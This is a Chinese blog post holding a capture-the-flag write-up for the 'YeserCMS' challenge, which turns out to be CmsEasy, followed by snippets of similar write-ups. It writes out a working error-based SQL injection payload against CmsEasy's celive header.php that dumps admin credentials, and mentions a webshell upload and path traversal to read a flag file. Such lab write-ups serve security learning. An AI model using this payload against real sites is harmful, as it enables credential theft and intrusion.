百度杯”CTF比赛 九月场YeserCMS

最新推荐文章于 2023-10-30 12:15:00 发布
原创 最新推荐文章于 2023-10-30 12:15:00 发布 · 431 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#ctf
本文详细记录了一次针对YeserCMS系统的渗透测试过程,从发现并利用SQL注入漏洞,到获取数据库信息,再到成功上传木马并获取flag,展示了完整的攻击链路和技术细节。 
									百度杯”CTF比赛 九月场YeserCMS

打开网站,看见YESERCMS,查了下好像没有这个CMS,直接CMS指纹识别一下,发现是CMSEASY。

网上找相关GETSHELL漏洞,发现一个伪造IP进入后台的洞,但是PING不通,暂时无法获得准确的IP地址,最后在http://www.hacksec.cn/codesec/378.html博客上发现SQL注入漏洞。
POC:
http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads /celive/live/header.php
xajax=LiveMessage&xajaxargs[0]=name’, (UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,’|’,password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)–%20
发现URL不能访问,查看其它的注入文章时(https://www.secpulse.com/archives/41265.html)发现将upload目录去掉。
注入结果:Table ‘Yeser.cmseasy_user’ doesn’t exist
可能不是原本的数据库,先猜测数据库名称为yesercms_user,修改查询的长度,得到完整的账户密码。
XPATH syntax error: '[admin|ff512d4240cbbdeafada404677ccb
MD5:Yeser231
在专题目录尝试一句话木马,木马上传成功,但是无法访问
题目提示flag.php在根目录,在模板编辑页面发现可以编辑html的内容,抓包可以看出通过ID参数获取HTML的内容,尝试目录遍历最终在…/…/flag.php中获取到flag的内容

百度CTF比赛 九月--YeserCMS
Oavinci的博客
03-22 702
正在上传…重新上传取消 在文档下载的评论区发现是EASYCMS 正在上传…重新上传取消 百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html 访问/celive/live/header.php进行报错注入 爆数据库,得到“Yeser...
百度CTF比赛 九月 YeserCMS 详细解析
drip_big的博客
04-14 955
百度CTF比赛 九月 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
百度CTF比赛 九月_YeserCMS
a173262565的博客
04-14 289
题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直接进行报错注入 xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(Updat...
YeserCMS
weixin_30371875的博客
07-24 314
这道题直接让我们查网站根目录的flag,我首先想到的是一句话木马,但是奈何找不到上传的接口啊,只好作罢, 在下载发现有个cmseasy的标识,明显是要提示我们这里是easycms,百度easycms的漏洞然后注入 注入点: http://cac6d32bf8ff4b52becb3516148c9c106deeaa1e92b64a8e.changame.ichunqiu.com//celive...
Ajax post sql注入,cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
weixin_39778582的博客
08-05 503
摘要cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无�cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无视gpc的sql注入我下载的是最新版本的cmseasy,之前有人提过这里的漏洞,官方进行了修补,但是越修补,越捉急,直接看代码:这里是注册函数的地方celive.class.php(480-497):function xajax_live()...
百度CTF比赛 九月 YeserCMS writeup
yipyuenkay的博客
03-29 439
CMS类型题目一般思路: 第一步,判断出cms类型 第二步,查询该cms曾经出现的漏洞 第三步,然后利用这些漏洞拿到flag. 搜yesercms全是writeup…… 就随便点点,文件下载那里发现应该cmseasy才是其真正的cms 解题过程 Step1 搜索CMSeasy的漏洞 百度CMSeasy存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考1:https://www....
i春秋python_i春秋CTF-YeserCMS
weixin_29707757的博客
01-14 261
分析打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS访问url/celive/live/header.php,直接进行报错注入数据库:xajax=Postdata&xajaxargs[0]=detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32...
百度CTF比赛 九月 YeserCMS
weixin_30852451的博客
06-13 299
打开题目 进入后是一个cms,但肯定的是这个cms不叫yesercms 于是我们开始随便翻翻,寻找信息,后台我也看了除了一个登陆界面,就没有其他的提示信息。 最后在文档下载的评论栏里发现,这个cms的真正名称是cmseasy。 上网去查cmseasy的漏洞 然后大致查了下应该是sql注入漏洞 于是构造报错注入测试一下 回显内容,还告诉了我们这个sql语句的完整内容,总...
i春秋 “百度CTF比赛 九月 YeserCMS
include_heqile的博客
09-08 1538
https://www.ichunqiu.com/battalion?t=1 首先说明一点,这题怒是我自己做出来的,我参考了很多博主的writeup,但是他们的writeup只是提示我应该去利用什么漏洞: https://www.w00yun.top/bugs/wooyun-2015-0137013.html 虽然知道了是这个漏洞,但是我不会利用,在这上面耗了很长时间,因为我直接把漏洞报...
[百度]九月 YeserCMS writeup
Flyour的博客
04-05 2678
Yesercms 题目里面说这是一个新的cms,让大家测一测有没有漏洞。哼,都是套路。 老规矩: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 看一下网站内容,没有明显的标志标明是什么cms。不过当我浏览一遍网站的内容后,发现这个网站真是东拼西凑啊,又是卖电子产品,...
WP 4 i春秋_百度CTF比赛九月第一
segOt
04-22 2725
CODECODE打开页面后,看到一张图片,且链接为如下形式:http://528c1f8ff4fe439482ce4069e858e805ad9172679385471a.ctf.game/index.php?jpg=hei.jpg 可以看到参数jpg后面跟着一个文件名,查看网页源代码发现,此图片是采用BASE64编码形式显示的。所以可以采取如下方式http://...index.php?jpg=i
百度CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
"百度"CTF 9月2日 WriteUp.md
Bendawang's Blog
09-04 9833
"百度"CTF 9月2日 WriteUp
百度九月-YeserCMS wp
hijack89的博客
10-16 711
思路 确定CMS类型 查找该CMS出现过的漏洞 利用漏洞拿到shell,get flag 确定CMS类型 从评论处确定是CMSEASY 查找公开漏洞 找到一个注入漏洞cmseasy无限制报错漏洞,得知是一个报错注入,从文中找到poc,经URL解码如下xajax=Postdata&amp;xajaxargs[0]=&lt;xjxquery&gt;&lt;q&gt;detail=xxxxxx',...
[百度] 九月第二周 Sqli writeup
Flyour的博客
04-01 1900
这道sql注入题折磨了我相当久,痛哭流涕啊! 拿到题,访问url: http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 老套路,先看源码,提示 login.php?id=1 ,心里想着都是套路,然后访问url: http:...
i春秋 “百度CTF比赛 九月 再见CMS
include_heqile的博客
09-11 2591
https://www.ichunqiu.com/battalion?t=1&amp;r=0 这道题刚做的时候是没有头绪的,看了一眼writeup,得知要通过网站下方的备案记录来查询除网站相关信息,并进而得知该网站所使用的的cms,但是我照着做的时候却查不出来结果,ICP/IP官网返回说无匹配信息,于是我就参考writeup直接搜索了齐博CMS的相关漏洞,我使用的是这一个: http://0d...
[百度]九月 再见CMS writeup
Flyour的博客
04-05 2023
再见CMS 拿到链接是一个博客网站,对于这样的题目: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 这是该网站的登录页面,根据这个登录页面和下方的备案号、版权声明的格式都可以判断出这是个齐博cms。 下面是齐博CMS的整站系统:http://v7.qibosof...
黑客网站大全!都在这了!速看被删就没了
m0_61869253的博客
10-30 8873
网址:http://kingjzb001.w113.leoboard.com/01/index.asp。网址:http://www.softhouse.com.cn/docs/security.html。网址:http://www.chinesehack.org/down/list.asp。网址:http://www.zikao100.net/newyouth/bbs/网址:http://www.shockhack.net/hzhacker/1/
百度CTF比赛 九月 类型:Web 题目名称:SQLi
大方子
08-01 2928
收获的知识: 重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下 sql注入也要留意HTTP信息的变化 可以利用SQL map跑一下看看有没有有用的信息 不使用单引号和逗号的注入的注入技巧       发现页面空白 然后查看源文件 发现另一个页面 进去后出现   后来手测和用sqlmap跑感觉这不是一个注入点 看了别人的writeup之后发现...
百度CTF比赛 九月 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 4024
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值